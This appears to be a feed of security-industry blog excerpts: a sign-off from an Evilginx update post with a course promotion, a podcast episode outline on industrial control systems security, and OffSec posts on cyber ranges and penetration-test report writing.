Please let me know your feedback about the update, either on Twitter @mrgretzky or in BREAKDEV RED Discord.
Looking forward to your opinion!
If you're reading this before 3rd April 2024, you can still get a 30% discount for the Evilginx Mastery course, which I am constantly updating and you get access for a lifetime. Expect to see the GoPhish integration guide added sometime in the future.
Happy phishing!
-- Kuba Gretzky
See your enterprise through the eyes of an attacker – More than a concept — a Proof of Value
The post NodeZero: More than a concept — a Proof of Value appeared first on Horizon3.ai.
Thomas Pace of NetRise talks about industrial control systems security. We’ll learn about Pace's time in the United States Marine Corps in cyber-intelligence, his move to forensics and then ICS and why the greatest asset a security professional can have is the ability to find, clearly see and create narratives. I always find ICS professionals to be fascinating, and Pace took us down some new paths, so if you’re also interested in ICS Security, keep it here for today’s episode of Cyber Work!
0:00 - Industrial Control Systems security
1:39 - How Pace got into cybersecurity
4:31 - The speed of cybersecurity's change
5:20 - Pace's career in cyber intelligence
10:08 - Importance of cybersecurity analysis
10:55 - Current state of ICS and infrastructure security in the U.S.
25:22 - How to work in ICS security
32:52 - Manufacturing security issues
38:00 - Security risks for cranes
40:51 - Best ICS security advice
44:09 - Best cybersecurity career advice
46:15 - What is NetRise?
47:40 - Learn more about Pace
48:25 - Outro
– Get your FREE cybersecurity training resources: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast
About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.
In 2024, the cybersecurity landscape is bleak, with 62% of organizations acknowledging a pressing need for enhanced cybersecurity skills amidst growing digital threats. This statistic underscores the urgent demand for comprehensive training in modern cybersecurity practices. In response to this critical need, OffSec is introducing a new suite of Cyber Ranges.
OffSec’s Cyber Ranges – our solution for realistic, high-impact cybersecurity training. This suite delivers a powerful combination:
Together, these ranges create an unmatched training experience for your entire cybersecurity team.
OffSec’s Enterprise Cyber Range
Traditional cybersecurity training often falls short.
The post Transform Your Cybersecurity Training with OffSec’s Cyber Ranges appeared first on OffSec.
Pentesters are well known for their technical skill sets, they simulate cyber attacks on computer systems, networks, or applications in a controlled environment. And, their primary goal is to identify vulnerabilities and weaknesses to assess the security posture of a target system. Much of the work they do is technical in nature, but in order to help organizations understand and rectify their vulnerabilities before malicious hackers can exploit them, communicating that risk through report writing is nearly as important as finding the risk.
This is where soft skills like report writing become just as important as their technical skills.
In this blog post, we’ll address the value of report writing for penetration testers, show examples of reports, highlight some mistakes that are often made,
The post Importance of report writing for pen testers appeared first on OffSec.